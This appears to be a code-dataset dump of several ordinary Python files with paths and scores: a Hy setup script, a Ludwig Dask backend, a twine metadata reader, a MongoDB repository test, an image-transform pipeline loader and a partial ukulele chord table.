if mo:
__version__ = mo.group(1)
else:
msg = "if %s.py exists, it is required to be well-formed" % VERSIONFILE
raise RuntimeError(msg)
long_description = """Hy is a Python <--> Lisp layer. It helps
make things work nicer, and lets Python and the Hy lisp variant play
nice together. """
install_requires = ['rply>=0.7.0', 'astor>=0.5', 'clint>=0.4']
if sys.version_info[:2] < (2, 7):
install_requires.append('argparse>=1.2.1')
install_requires.append('importlib>=1.0.2')
if os.name == 'nt':
install_requires.append('pyreadline>=2.1')
setup(
name=PKG,
version=__version__,
install_requires=install_requires,
entry_points={
'console_scripts': [
'hy = hy.cmdline:hy_main',
'hyc = hy.cmdline:hyc_main',
'hy2py = hy.cmdline:hy2py_main',
]
},
packages=find_packages(exclude=['tests*']),
package_data={
'hy.contrib': ['*.hy'],
'hy.core': ['*.hy'],
},
author="<NAME>",
author_email="<EMAIL>",
long_description=long_description,
description='Lisp and Python love each other.',
license="Expat",
url="http://hylang.org/",
platforms=['any'],
classifiers=[
"Development Status :: 4 - Beta",
"Intended Audience :: Developers",
"License :: DFSG approved",
"License :: OSI Approved :: MIT License", # Really "Expat". Ugh.
"Operating System :: OS Independent",
"Programming Language :: Lisp",
"Programming Language :: Python",
"Programming Language :: Python :: 2",
"Programming Language :: Python :: 2.6",
"Programming Language :: Python :: 2.7",
"Programming Language :: Python :: 3",
"Programming Language :: Python :: 3.3",
"Programming Language :: Python :: 3.4",
"Programming Language :: Python :: 3.5",
"Topic :: Software Development :: Code Generators",
"Topic :: Software Development :: Compilers",
"Topic :: Software Development :: Libraries",
]
) | 0.232833 | 0.116011 |
from ludwig.backend.base import Backend, LocalTrainingMixin
from ludwig.constants import NAME, PARQUET, PREPROCESSING
from ludwig.data.dataframe.dask import DaskEngine
from ludwig.data.dataset.partitioned import PartitionedDataset
from ludwig.models.predictor import BasePredictor, Predictor, get_output_columns
class DaskRemoteModel:
def __init__(self, model):
self.cls, self.args, state = list(model.__reduce__())
self.state = state
def load(self):
obj = self.cls(*self.args)
# TODO(travis): get_connected_model is needed here because TF will not init
# all weights until the graph has been traversed
obj.get_connected_model()
obj.__setstate__(self.state)
return obj
class DaskPredictor(BasePredictor):
def __init__(self, predictor_kwargs):
self.predictor_kwargs = predictor_kwargs
def batch_predict(self, model, dataset, *args, **kwargs):
self._check_dataset(dataset)
remote_model = DaskRemoteModel(model)
predictor_kwargs = self.predictor_kwargs
output_columns = get_output_columns(model.output_features)
def batch_predict_partition(dataset):
model = remote_model.load()
predictor = Predictor(**predictor_kwargs)
predictions = predictor.batch_predict(model, dataset, *args, **kwargs)
ordered_predictions = predictions[output_columns]
return ordered_predictions
return dataset.map_dataset_partitions(
batch_predict_partition,
meta=[(c, 'object') for c in output_columns]
)
def batch_evaluation(self, model, dataset, collect_predictions=False, **kwargs):
raise NotImplementedError(
'Dask backend does not support batch evaluation at this time.'
)
def batch_collect_activations(self, model, *args, **kwargs):
raise NotImplementedError(
'Dask backend does not support collecting activations at this time.'
)
def _check_dataset(self, dataset):
if not isinstance(dataset, PartitionedDataset):
raise RuntimeError(
f'Dask backend requires PartitionedDataset for inference, '
f'found: {type(dataset)}'
)
def shutdown(self):
pass
class DaskBackend(LocalTrainingMixin, Backend):
def __init__(self, data_format=PARQUET, **kwargs):
super().__init__(data_format=data_format, **kwargs)
self._df_engine = DaskEngine()
if data_format != PARQUET:
raise ValueError(
f'Data format {data_format} is not supported when using the Dask backend. '
f'Try setting to `parquet`.'
)
def initialize(self):
pass
def create_predictor(self, **kwargs):
return DaskPredictor(kwargs)
@property
def df_engine(self):
return self._df_engine
@property
def supports_multiprocessing(self):
return False
def check_lazy_load_supported(self, feature):
if not feature[PREPROCESSING]['in_memory']:
raise ValueError(
f'DaskBackend does not support lazy loading of data files at train time. '
f'Set preprocessing config `in_memory: True` for feature {feature[NAME]}') | ludwig/backend/dask.py |
from ludwig.backend.base import Backend, LocalTrainingMixin
from ludwig.constants import NAME, PARQUET, PREPROCESSING
from ludwig.data.dataframe.dask import DaskEngine
from ludwig.data.dataset.partitioned import PartitionedDataset
from ludwig.models.predictor import BasePredictor, Predictor, get_output_columns
class DaskRemoteModel:
def __init__(self, model):
self.cls, self.args, state = list(model.__reduce__())
self.state = state
def load(self):
obj = self.cls(*self.args)
# TODO(travis): get_connected_model is needed here because TF will not init
# all weights until the graph has been traversed
obj.get_connected_model()
obj.__setstate__(self.state)
return obj
class DaskPredictor(BasePredictor):
def __init__(self, predictor_kwargs):
self.predictor_kwargs = predictor_kwargs
def batch_predict(self, model, dataset, *args, **kwargs):
self._check_dataset(dataset)
remote_model = DaskRemoteModel(model)
predictor_kwargs = self.predictor_kwargs
output_columns = get_output_columns(model.output_features)
def batch_predict_partition(dataset):
model = remote_model.load()
predictor = Predictor(**predictor_kwargs)
predictions = predictor.batch_predict(model, dataset, *args, **kwargs)
ordered_predictions = predictions[output_columns]
return ordered_predictions
return dataset.map_dataset_partitions(
batch_predict_partition,
meta=[(c, 'object') for c in output_columns]
)
def batch_evaluation(self, model, dataset, collect_predictions=False, **kwargs):
raise NotImplementedError(
'Dask backend does not support batch evaluation at this time.'
)
def batch_collect_activations(self, model, *args, **kwargs):
raise NotImplementedError(
'Dask backend does not support collecting activations at this time.'
)
def _check_dataset(self, dataset):
if not isinstance(dataset, PartitionedDataset):
raise RuntimeError(
f'Dask backend requires PartitionedDataset for inference, '
f'found: {type(dataset)}'
)
def shutdown(self):
pass
class DaskBackend(LocalTrainingMixin, Backend):
def __init__(self, data_format=PARQUET, **kwargs):
super().__init__(data_format=data_format, **kwargs)
self._df_engine = DaskEngine()
if data_format != PARQUET:
raise ValueError(
f'Data format {data_format} is not supported when using the Dask backend. '
f'Try setting to `parquet`.'
)
def initialize(self):
pass
def create_predictor(self, **kwargs):
return DaskPredictor(kwargs)
@property
def df_engine(self):
return self._df_engine
@property
def supports_multiprocessing(self):
return False
def check_lazy_load_supported(self, feature):
if not feature[PREPROCESSING]['in_memory']:
raise ValueError(
f'DaskBackend does not support lazy loading of data files at train time. '
f'Set preprocessing config `in_memory: True` for feature {feature[NAME]}') | 0.636127 | 0.203787 |
import glob
import os
import sys
import warnings
from typing import Optional
import pkginfo
class Installed(pkginfo.Installed):
def read(self) -> Optional[str]:
opj = os.path.join
if self.package is not None:
package = self.package.__package__
if package is None:
package = self.package.__name__
egg_pattern = "%s*.egg-info" % package
dist_pattern = "%s*.dist-info" % package
file: Optional[str] = getattr(self.package, "__file__", None)
if file is not None:
candidates = []
def _add_candidate(where: str) -> None:
candidates.extend(glob.glob(where))
for entry in sys.path:
if file.startswith(entry):
_add_candidate(opj(entry, "METADATA")) # egg?
_add_candidate(opj(entry, "EGG-INFO")) # egg?
# dist-installed?
_add_candidate(opj(entry, egg_pattern))
_add_candidate(opj(entry, dist_pattern))
dir, name = os.path.split(self.package.__file__)
_add_candidate(opj(dir, egg_pattern))
_add_candidate(opj(dir, dist_pattern))
_add_candidate(opj(dir, "..", egg_pattern))
_add_candidate(opj(dir, "..", dist_pattern))
for candidate in candidates:
if os.path.isdir(candidate):
path = opj(candidate, "PKG-INFO")
if not os.path.exists(path):
path = opj(candidate, "METADATA")
else:
path = candidate
if os.path.exists(path):
with open(path) as f:
return f.read()
warnings.warn(
"No PKG-INFO or METADATA found for package: %s" % self.package_name
)
return None | venv/Lib/site-packages/twine/_installed.py | import glob
import os
import sys
import warnings
from typing import Optional
import pkginfo
class Installed(pkginfo.Installed):
def read(self) -> Optional[str]:
opj = os.path.join
if self.package is not None:
package = self.package.__package__
if package is None:
package = self.package.__name__
egg_pattern = "%s*.egg-info" % package
dist_pattern = "%s*.dist-info" % package
file: Optional[str] = getattr(self.package, "__file__", None)
if file is not None:
candidates = []
def _add_candidate(where: str) -> None:
candidates.extend(glob.glob(where))
for entry in sys.path:
if file.startswith(entry):
_add_candidate(opj(entry, "METADATA")) # egg?
_add_candidate(opj(entry, "EGG-INFO")) # egg?
# dist-installed?
_add_candidate(opj(entry, egg_pattern))
_add_candidate(opj(entry, dist_pattern))
dir, name = os.path.split(self.package.__file__)
_add_candidate(opj(dir, egg_pattern))
_add_candidate(opj(dir, dist_pattern))
_add_candidate(opj(dir, "..", egg_pattern))
_add_candidate(opj(dir, "..", dist_pattern))
for candidate in candidates:
if os.path.isdir(candidate):
path = opj(candidate, "PKG-INFO")
if not os.path.exists(path):
path = opj(candidate, "METADATA")
else:
path = candidate
if os.path.exists(path):
with open(path) as f:
return f.read()
warnings.warn(
"No PKG-INFO or METADATA found for package: %s" % self.package_name
)
return None | 0.372049 | 0.06148 |
from bson import ObjectId
from app.api.data.command.UserMongoCommandRepository import UserMongoCommandRepository
from app.api.domain.models.User import User
from app.api.domain.services.data.command.errors.CommandError import CommandError
from tests.integration.PdbMongoIntegrationTestBase import PdbMongoIntegrationTestBase
class UserMongoCommandRepositoryIntegrationTest(PdbMongoIntegrationTestBase):
def setUp(self):
self.fixtures = []
super(UserMongoCommandRepositoryIntegrationTest, self).setUp()
self.sut = UserMongoCommandRepository()
def tearDown(self):
self.db.users.delete_many({})
def test_updateUserAuthToken_calledWithValidAuthToken_authTokenCorrectlyUpdated(self):
test_id = ObjectId("5aae93045b488007cb4af590")
self.db.users.insert_one(
{"email": "<EMAIL>", "password": "<PASSWORD>", "nickname": "jimmy", "role": "student",
"_id": test_id})
self.sut.update_user_auth_token(test_id, "testauthtoken")
actual = User.from_json(self.db.users.find_one({"_id": test_id})).get_authtoken()
expected = "testauthtoken"
self.assertEqual(actual, expected)
def test_createUser_calledWithValidUser_userCorrectlyInserted(self):
test_user = self.__get_user_test_instance()
self.sut.create_user(test_user)
self.assertEqual(test_user.to_json_dict(), self.db.users.find_one({"email": "<EMAIL>"}))
def test_createUser_calledWithExistentUser_throwCommandError(self):
user = self.__get_user_test_instance()
self.sut.create_user(user)
self.assertRaises(CommandError, self.sut.create_user, user)
def test_incrementUserScore_calledWithExistentUserId_userScoreCorrectlyIncremented(self):
test_id = ObjectId("5aae93045b488007cb4af590")
self.db.users.insert_one(
{"email": "<EMAIL>", "password": "<PASSWORD>", "nickname": "jimmy", "role": "student",
"_id": test_id, "score": 400})
self.sut.increment_user_score(test_id, 30)
expected = 430
actual = User.from_json(self.db.users.find_one({"_id": test_id})).get_score()
self.assertEqual(actual, expected)
def __get_user_test_instance(self):
return User(_id=ObjectId("666f6f2d6261722d71757578"), email="<EMAIL>", password="<PASSWORD>",
role="master", nickname="testnickname") | app/tests/integration/UserMongoCommandRepositoryIntegrationTest.py | from bson import ObjectId
from app.api.data.command.UserMongoCommandRepository import UserMongoCommandRepository
from app.api.domain.models.User import User
from app.api.domain.services.data.command.errors.CommandError import CommandError
from tests.integration.PdbMongoIntegrationTestBase import PdbMongoIntegrationTestBase
class UserMongoCommandRepositoryIntegrationTest(PdbMongoIntegrationTestBase):
def setUp(self):
self.fixtures = []
super(UserMongoCommandRepositoryIntegrationTest, self).setUp()
self.sut = UserMongoCommandRepository()
def tearDown(self):
self.db.users.delete_many({})
def test_updateUserAuthToken_calledWithValidAuthToken_authTokenCorrectlyUpdated(self):
test_id = ObjectId("5aae93045b488007cb4af590")
self.db.users.insert_one(
{"email": "<EMAIL>", "password": "<PASSWORD>", "nickname": "jimmy", "role": "student",
"_id": test_id})
self.sut.update_user_auth_token(test_id, "testauthtoken")
actual = User.from_json(self.db.users.find_one({"_id": test_id})).get_authtoken()
expected = "testauthtoken"
self.assertEqual(actual, expected)
def test_createUser_calledWithValidUser_userCorrectlyInserted(self):
test_user = self.__get_user_test_instance()
self.sut.create_user(test_user)
self.assertEqual(test_user.to_json_dict(), self.db.users.find_one({"email": "<EMAIL>"}))
def test_createUser_calledWithExistentUser_throwCommandError(self):
user = self.__get_user_test_instance()
self.sut.create_user(user)
self.assertRaises(CommandError, self.sut.create_user, user)
def test_incrementUserScore_calledWithExistentUserId_userScoreCorrectlyIncremented(self):
test_id = ObjectId("5aae93045b488007cb4af590")
self.db.users.insert_one(
{"email": "<EMAIL>", "password": "<PASSWORD>", "nickname": "jimmy", "role": "student",
"_id": test_id, "score": 400})
self.sut.increment_user_score(test_id, 30)
expected = 430
actual = User.from_json(self.db.users.find_one({"_id": test_id})).get_score()
self.assertEqual(actual, expected)
def __get_user_test_instance(self):
return User(_id=ObjectId("666f6f2d6261722d71757578"), email="<EMAIL>", password="<PASSWORD>",
role="master", nickname="testnickname") | 0.384912 | 0.149345 |
import logging
import torchvision.transforms
import torchvision.utils
import thelper.utils
logger = logging.getLogger(__name__)
def load_transforms(stages, avoid_transform_wrapper=False):
"""Loads a transformation pipeline from a list of stages.
Each entry in the provided list will be considered a stage in the pipeline. The ordering of the stages
is important, as some transformations might not be compatible if taken out of order. The entries must
each be dictionaries that define an operation, its parameters, and some meta-parameters (detailed below).
The ``operation`` field of each stage will be used to dynamically import a specific type of operation to
apply. The ``params`` field of each stage will then be used to pass parameters to the constructor of
this operation.
If an operation is identified as ``"Augmentor.Pipeline"`` or ``"albumentations.Compose"``, it will be
specially handled. In both case, the ``params`` field becomes mandatory in the stage dictionary, and it
must specify the Augmentor or albumentations pipeline operation names and parameters (as a dictionary).
Two additional optional config fields can then be set for Augmentor pipelines: ``input_tensor`` (bool)
which specifies whether the previous stage provides a ``torch.Tensor`` to the pipeline (default=False);
and ``output_tensor`` (bool) which specifies whether the output of the pipeline should be converted into
a tensor (default=False). For albumentations pipelines, two additional fields are also available, namely
``bbox_params`` (dict) and ``keypoint_params`` (dict). For more information on these, refer to the
documentation of ``albumentations.core.composition.Compose``. Finally, when unpacking dictionaries for
albumentations pipelines, the keys associated to bounding boxes/masks/keypoints that must be forwarded
to the composer can be specified via the ``bboxes_key``, ``mask_key``, and ``keypoints_key`` fields.
All operations can also specify which sample components they should be applied to via the ``target_key``
field. This field can contain a single key (typically a string), or a list of keys. The operation will
be applied at runtime to all values which are found in the samples with one of those keys. If no key is
provided for an operation, it will be applied to all array-like components of the sample. Finally, all
operations can specify a ``linked_fate`` field (bool) to specify whether the samples provided in lists
should all have the same fate or not (default=True).
Usage examples inside a session configuration file::
# ...
# the 'loaders' field may contain several transformation pipelines
# (see 'thelper.data.utils.create_loaders' for more information on these pipelines)
"loaders": {
# ...
# the 'base_transforms' operations are applied to all loaded samples
"base_transforms": [
{
"operation": "...",
"params": {
...
},
"target_key": [ ... ],
"linked_fate": ...
},
{
"operation": "...",
"params": {
...
},
"target_key": [ ... ],
"linked_fate": ...
},
...
],
# ...
Args:
stages: a list defining a series of transformations to apply as a single pipeline.
Returns:
A transformation pipeline object compatible with the ``torchvision.transforms`` interface.
.. seealso::
| :class:`thelper.transforms.wrappers.AlbumentationsWrapper`
| :class:`thelper.transforms.wrappers.AugmentorWrapper`
| :class:`thelper.transforms.wrappers.TransformWrapper`
| :func:`thelper.transforms.utils.load_augments`
| :func:`thelper.data.utils.create_loaders`
"""
assert isinstance(stages, list), "expected stages to be provided as a list"
if not stages:
return None, True # no-op transform, and dont-care append
assert all([isinstance(stage, dict) for stage in stages]), "expected all stages to be provided as dictionaries"
operations = []
for stage_idx, stage in enumerate(stages):
assert "operation" in stage and stage["operation"], f"stage #{stage_idx} is missing its operation field"
operation_name = stage["operation"]
operation_params = thelper.utils.get_key_def(["params", "parameters"], stage, {})
assert isinstance(operation_params, dict), f"stage #{stage_idx} parameters are not provided as a dictionary"
operation_targets = None
if "target_key" in stage:
assert isinstance(stage["target_key"], (list, str, int)), \
f"stage #{stage_idx} target keys are not provided as a list or string/int"
operation_targets = stage["target_key"] if isinstance(stage["target_key"], list) else [stage["target_key"]]
linked_fate = thelper.utils.str2bool(stage["linked_fate"]) if "linked_fate" in stage else True
if operation_name == "Augmentor.Pipeline":
import Augmentor
pipeline = Augmentor.Pipeline()
assert isinstance(operation_params, dict) and operation_params, \
"augmentor pipeline 'params' field should contain dictionary of suboperations"
for pipeline_op_name, pipeline_op_params in operation_params.items():
getattr(pipeline, pipeline_op_name)(**pipeline_op_params)
if "input_tensor" in stage and thelper.utils.str2bool(stage["input_tensor"]):
operations.append(torchvision.transforms.ToPILImage())
operations.append(thelper.transforms.wrappers.AugmentorWrapper(pipeline, operation_targets, linked_fate))
if "output_tensor" in stage and thelper.utils.str2bool(stage["output_tensor"]):
operations.append(torchvision.transforms.ToTensor())
elif operation_name == "albumentations.Compose":
assert isinstance(operation_params, dict) and operation_params, \
"albumentations pipeline 'params' field should contain dictionary of suboperations"
suboperations = []
for op_name, op_params in operation_params.items():
if not op_name.startswith("albumentations."):
op_name = "albumentations." + op_name
op_type = thelper.utils.import_class(op_name)
suboperations.append(op_type(**op_params))
probability = thelper.utils.get_key_def("probability", stage, 1.0)
to_tensor = thelper.utils.get_key_def("to_tensor", stage, None)
bbox_params = thelper.utils.get_key_def("bbox_params", stage, {})
add_targets = thelper.utils.get_key_def("add_targets", stage, {})
bboxes_key = thelper.utils.get_key_def("bboxes_key", stage, "bbox")
mask_key = thelper.utils.get_key_def("mask_key", stage, "mask")
keypoints_key = thelper.utils.get_key_def("keypoints_key", stage, "keypoints")
cvt_kpts_to_bboxes = thelper.utils.str2bool(thelper.utils.get_key_def("cvt_kpts_to_bboxes", stage, False))
operations.append(thelper.transforms.wrappers.AlbumentationsWrapper(
transforms=suboperations, to_tensor=to_tensor, bbox_params=bbox_params, add_targets=add_targets,
image_key=operation_targets, bboxes_key=bboxes_key, mask_key=mask_key, keypoints_key=keypoints_key,
probability=probability, cvt_kpts_to_bboxes=cvt_kpts_to_bboxes, linked_fate=linked_fate))
else:
operation_type = thelper.utils.import_class(operation_name)
try:
operation = operation_type(**operation_params)
except Exception:
logger.error(f"failed to create transform op {operation_name} with params:\n\t{str(operation_params)}")
raise
if not avoid_transform_wrapper and not isinstance(operation, (thelper.transforms.wrappers.TransformWrapper,
thelper.transforms.operations.NoTransform,
torchvision.transforms.Compose)):
operations.append(thelper.transforms.wrappers.TransformWrapper(operation,
target_keys=operation_targets,
linked_fate=linked_fate))
else:
operations.append(operation)
if len(operations) > 1:
return thelper.transforms.Compose(operations)
elif len(operations) == 1:
return operations[0]
else:
return None
def load_augments(config):
"""Loads a data augmentation pipeline.
An augmentation pipeline is essentially a specialized transformation pipeline that can be appended or
prefixed to the base transforms defined for all samples. Augmentations are typically used to diversify
the samples within the training set in order to help model generalization. They can also be applied to
validation and test samples in order to get multiple responses for the same input so that they can
be averaged/concatenated into a single output.
Usage examples inside a session configuration file::
# ...
# the 'loaders' field can contain several augmentation pipelines
# (see 'thelper.data.utils.create_loaders' for more information on these pipelines)
"loaders": {
# ...
# the 'train_augments' operations are applied to training samples only
"train_augments": {
# specifies whether to apply the augmentations before or after the base transforms
"append": false,
"transforms": [
{
# here, we use a single stage, which is actually an augmentor sub-pipeline
# that is purely probabilistic (i.e. it does not increase input sample count)
"operation": "Augmentor.Pipeline",
"params": {
# the augmentor pipeline defines two operations: rotations and flips
"rotate_random_90": {"probability": 0.75},
"flip_random": {"probability": 0.75}
}
}
]
},
# ...
}
# ...
Args:
config: the configuration dictionary defining the meta parameters as well as the list of transformation
operations of the augmentation pipeline.
Returns:
A tuple that consists of a pipeline compatible with the ``torchvision.transforms`` interfaces, and
a bool specifying whether this pipeline should be appended or prefixed to the base transforms.
.. seealso::
| :class:`thelper.transforms.wrappers.AugmentorWrapper`
| :func:`thelper.transforms.utils.load_transforms`
| :func:`thelper.data.utils.create_loaders`
"""
assert isinstance(config, dict), "augmentation config should be provided as dictionary"
augments = None
augments_append = False
if "append" in config:
augments_append = thelper.utils.str2bool(config["append"])
if "transforms" in config and config["transforms"]:
augments = thelper.transforms.load_transforms(config["transforms"])
return augments, augments_append | thelper/transforms/utils.py | import logging
import torchvision.transforms
import torchvision.utils
import thelper.utils
logger = logging.getLogger(__name__)
def load_transforms(stages, avoid_transform_wrapper=False):
"""Loads a transformation pipeline from a list of stages.
Each entry in the provided list will be considered a stage in the pipeline. The ordering of the stages
is important, as some transformations might not be compatible if taken out of order. The entries must
each be dictionaries that define an operation, its parameters, and some meta-parameters (detailed below).
The ``operation`` field of each stage will be used to dynamically import a specific type of operation to
apply. The ``params`` field of each stage will then be used to pass parameters to the constructor of
this operation.
If an operation is identified as ``"Augmentor.Pipeline"`` or ``"albumentations.Compose"``, it will be
specially handled. In both case, the ``params`` field becomes mandatory in the stage dictionary, and it
must specify the Augmentor or albumentations pipeline operation names and parameters (as a dictionary).
Two additional optional config fields can then be set for Augmentor pipelines: ``input_tensor`` (bool)
which specifies whether the previous stage provides a ``torch.Tensor`` to the pipeline (default=False);
and ``output_tensor`` (bool) which specifies whether the output of the pipeline should be converted into
a tensor (default=False). For albumentations pipelines, two additional fields are also available, namely
``bbox_params`` (dict) and ``keypoint_params`` (dict). For more information on these, refer to the
documentation of ``albumentations.core.composition.Compose``. Finally, when unpacking dictionaries for
albumentations pipelines, the keys associated to bounding boxes/masks/keypoints that must be forwarded
to the composer can be specified via the ``bboxes_key``, ``mask_key``, and ``keypoints_key`` fields.
All operations can also specify which sample components they should be applied to via the ``target_key``
field. This field can contain a single key (typically a string), or a list of keys. The operation will
be applied at runtime to all values which are found in the samples with one of those keys. If no key is
provided for an operation, it will be applied to all array-like components of the sample. Finally, all
operations can specify a ``linked_fate`` field (bool) to specify whether the samples provided in lists
should all have the same fate or not (default=True).
Usage examples inside a session configuration file::
# ...
# the 'loaders' field may contain several transformation pipelines
# (see 'thelper.data.utils.create_loaders' for more information on these pipelines)
"loaders": {
# ...
# the 'base_transforms' operations are applied to all loaded samples
"base_transforms": [
{
"operation": "...",
"params": {
...
},
"target_key": [ ... ],
"linked_fate": ...
},
{
"operation": "...",
"params": {
...
},
"target_key": [ ... ],
"linked_fate": ...
},
...
],
# ...
Args:
stages: a list defining a series of transformations to apply as a single pipeline.
Returns:
A transformation pipeline object compatible with the ``torchvision.transforms`` interface.
.. seealso::
| :class:`thelper.transforms.wrappers.AlbumentationsWrapper`
| :class:`thelper.transforms.wrappers.AugmentorWrapper`
| :class:`thelper.transforms.wrappers.TransformWrapper`
| :func:`thelper.transforms.utils.load_augments`
| :func:`thelper.data.utils.create_loaders`
"""
assert isinstance(stages, list), "expected stages to be provided as a list"
if not stages:
return None, True # no-op transform, and dont-care append
assert all([isinstance(stage, dict) for stage in stages]), "expected all stages to be provided as dictionaries"
operations = []
for stage_idx, stage in enumerate(stages):
assert "operation" in stage and stage["operation"], f"stage #{stage_idx} is missing its operation field"
operation_name = stage["operation"]
operation_params = thelper.utils.get_key_def(["params", "parameters"], stage, {})
assert isinstance(operation_params, dict), f"stage #{stage_idx} parameters are not provided as a dictionary"
operation_targets = None
if "target_key" in stage:
assert isinstance(stage["target_key"], (list, str, int)), \
f"stage #{stage_idx} target keys are not provided as a list or string/int"
operation_targets = stage["target_key"] if isinstance(stage["target_key"], list) else [stage["target_key"]]
linked_fate = thelper.utils.str2bool(stage["linked_fate"]) if "linked_fate" in stage else True
if operation_name == "Augmentor.Pipeline":
import Augmentor
pipeline = Augmentor.Pipeline()
assert isinstance(operation_params, dict) and operation_params, \
"augmentor pipeline 'params' field should contain dictionary of suboperations"
for pipeline_op_name, pipeline_op_params in operation_params.items():
getattr(pipeline, pipeline_op_name)(**pipeline_op_params)
if "input_tensor" in stage and thelper.utils.str2bool(stage["input_tensor"]):
operations.append(torchvision.transforms.ToPILImage())
operations.append(thelper.transforms.wrappers.AugmentorWrapper(pipeline, operation_targets, linked_fate))
if "output_tensor" in stage and thelper.utils.str2bool(stage["output_tensor"]):
operations.append(torchvision.transforms.ToTensor())
elif operation_name == "albumentations.Compose":
assert isinstance(operation_params, dict) and operation_params, \
"albumentations pipeline 'params' field should contain dictionary of suboperations"
suboperations = []
for op_name, op_params in operation_params.items():
if not op_name.startswith("albumentations."):
op_name = "albumentations." + op_name
op_type = thelper.utils.import_class(op_name)
suboperations.append(op_type(**op_params))
probability = thelper.utils.get_key_def("probability", stage, 1.0)
to_tensor = thelper.utils.get_key_def("to_tensor", stage, None)
bbox_params = thelper.utils.get_key_def("bbox_params", stage, {})
add_targets = thelper.utils.get_key_def("add_targets", stage, {})
bboxes_key = thelper.utils.get_key_def("bboxes_key", stage, "bbox")
mask_key = thelper.utils.get_key_def("mask_key", stage, "mask")
keypoints_key = thelper.utils.get_key_def("keypoints_key", stage, "keypoints")
cvt_kpts_to_bboxes = thelper.utils.str2bool(thelper.utils.get_key_def("cvt_kpts_to_bboxes", stage, False))
operations.append(thelper.transforms.wrappers.AlbumentationsWrapper(
transforms=suboperations, to_tensor=to_tensor, bbox_params=bbox_params, add_targets=add_targets,
image_key=operation_targets, bboxes_key=bboxes_key, mask_key=mask_key, keypoints_key=keypoints_key,
probability=probability, cvt_kpts_to_bboxes=cvt_kpts_to_bboxes, linked_fate=linked_fate))
else:
operation_type = thelper.utils.import_class(operation_name)
try:
operation = operation_type(**operation_params)
except Exception:
logger.error(f"failed to create transform op {operation_name} with params:\n\t{str(operation_params)}")
raise
if not avoid_transform_wrapper and not isinstance(operation, (thelper.transforms.wrappers.TransformWrapper,
thelper.transforms.operations.NoTransform,
torchvision.transforms.Compose)):
operations.append(thelper.transforms.wrappers.TransformWrapper(operation,
target_keys=operation_targets,
linked_fate=linked_fate))
else:
operations.append(operation)
if len(operations) > 1:
return thelper.transforms.Compose(operations)
elif len(operations) == 1:
return operations[0]
else:
return None
def load_augments(config):
"""Loads a data augmentation pipeline.
An augmentation pipeline is essentially a specialized transformation pipeline that can be appended or
prefixed to the base transforms defined for all samples. Augmentations are typically used to diversify
the samples within the training set in order to help model generalization. They can also be applied to
validation and test samples in order to get multiple responses for the same input so that they can
be averaged/concatenated into a single output.
Usage examples inside a session configuration file::
# ...
# the 'loaders' field can contain several augmentation pipelines
# (see 'thelper.data.utils.create_loaders' for more information on these pipelines)
"loaders": {
# ...
# the 'train_augments' operations are applied to training samples only
"train_augments": {
# specifies whether to apply the augmentations before or after the base transforms
"append": false,
"transforms": [
{
# here, we use a single stage, which is actually an augmentor sub-pipeline
# that is purely probabilistic (i.e. it does not increase input sample count)
"operation": "Augmentor.Pipeline",
"params": {
# the augmentor pipeline defines two operations: rotations and flips
"rotate_random_90": {"probability": 0.75},
"flip_random": {"probability": 0.75}
}
}
]
},
# ...
}
# ...
Args:
config: the configuration dictionary defining the meta parameters as well as the list of transformation
operations of the augmentation pipeline.
Returns:
A tuple that consists of a pipeline compatible with the ``torchvision.transforms`` interfaces, and
a bool specifying whether this pipeline should be appended or prefixed to the base transforms.
.. seealso::
| :class:`thelper.transforms.wrappers.AugmentorWrapper`
| :func:`thelper.transforms.utils.load_transforms`
| :func:`thelper.data.utils.create_loaders`
"""
assert isinstance(config, dict), "augmentation config should be provided as dictionary"
augments = None
augments_append = False
if "append" in config:
augments_append = thelper.utils.str2bool(config["append"])
if "transforms" in config and config["transforms"]:
augments = thelper.transforms.load_transforms(config["transforms"])
return augments, augments_append | 0.86674 | 0.697107 |
__all__ = [
'CHORDS', 'CHORD_TABS',
'UkuleleNoteError', 'UkuleleChordError',
'get_chord', 'get_note'
]
class UkuleleNoteError(Exception) :
pass
class UkuleleChordError(Exception) :
pass
def get_note(string, fret) :
if abs(string) < len(FRETS) :
if abs(fret) < len(FRETS[string]) :
return FRETS[string][fret]
raise UkuleleNoteError(string, fret)
def get_chord(chord) :
if chord in CHORD_TABS :
return tuple([
get_note(string, fret) for string, fret in enumerate(CHORD_TABS[chord])
])
raise UkuleleChordError(chord)
FRETS = (
('G4', 'G#4', 'A4', 'A#4', 'B4', 'C5', 'C#5', 'D5', 'D#5', 'E5', 'F5', 'F#5', 'G5'),
('C4', 'C#4', 'D4', 'D#4', 'E4', 'F4', 'F#4', 'G4', 'G#4', 'A4', 'A#4', 'B4', 'C5'),
('E4', 'F4', 'F#4', 'G4', 'G#4', 'A4', 'A#4', 'B4', 'C5', 'C#5', 'D5', 'D#5', 'E5'),
('A4', 'A#4', 'B4', 'C5', 'C#5', 'D5', 'D#5', 'E5', 'F5', 'F#5', 'G5', 'G#5', 'A5'),
)
CHORD_TABS = {
'C' : (0, 0, 0, 3),
'C7' : (0, 0, 0, 1),
'Cm' : (0, 3, 3, 3),
'Cm7' : (3, 3, 3, 3),
'Cdim' : (2, 3, 2, 3),
'Caug' : (1, 0, 0, 3),
'C6' : (0, 0, 0, 0),
'Cmaj7' : (0, 0, 0, 2),
'C9' : (0, 2, 0, 1),
'C#' : (1, 1, 1, 4),
'C#7' : (1, 1, 1, 2),
'C#m' : (1, 1, 0, 3),
'C#m7' : (4, 4, 4, 4),
'C#dim' : (0, 1, 0, 1),
'C#aug' : (2, 1, 1, 0),
'C#6' : (1, 1, 1, 1),
'C#maj7' : (1, 1, 1, 3),
'C#9' : (1, 3, 1, 2),
'D' : (2, 2, 2, 0),
'D7' : (2, 2, 2, 3),
'Dm' : (2, 2, 1, 0),
'Dm7' : (2, 2, 1, 3),
'Ddim' : (1, 2, 1, 2),
'Daug' : (3, 2, 2, 1),
'D6' : (2, 2, 2, 2),
'Dmaj7' : (2, 2, 2, 4),
'D9' : (2, 4, 2, 3),
'Eb' : (1, 3, 3, 3),
'Eb7' : (3, 3, 3, 4),
'Ebm' : (3, 3, 2, 1),
'Ebm7' : (3, 3, 2, 4),
'Ebdim' : (2, 3, 2, 3),
'Ebaug' : (2, 1, 1, 4),
'Eb6' : (3, 3, 3, 3),
'Ebmaj7' : (3, 3, 3, 0),
'Eb9' : (0, 1, 1, 1),
'E' : (2, 4, 4, 4),
'E7' : (1, 2, 0, 2),
'Em' : (0, 4, 3, 2),
'Em7' : (0, 2, 0, 2),
'Edim' : (0, 1, 0, 1),
'Eaug' : (1, 0, 0, 3),
'E6' : (1, 0, 2, 0),
'Emaj7' : (1, 3, 0, 2),
'E9' : (1, 2, 2, 2),
'F' : (2, 0, 1, 0),
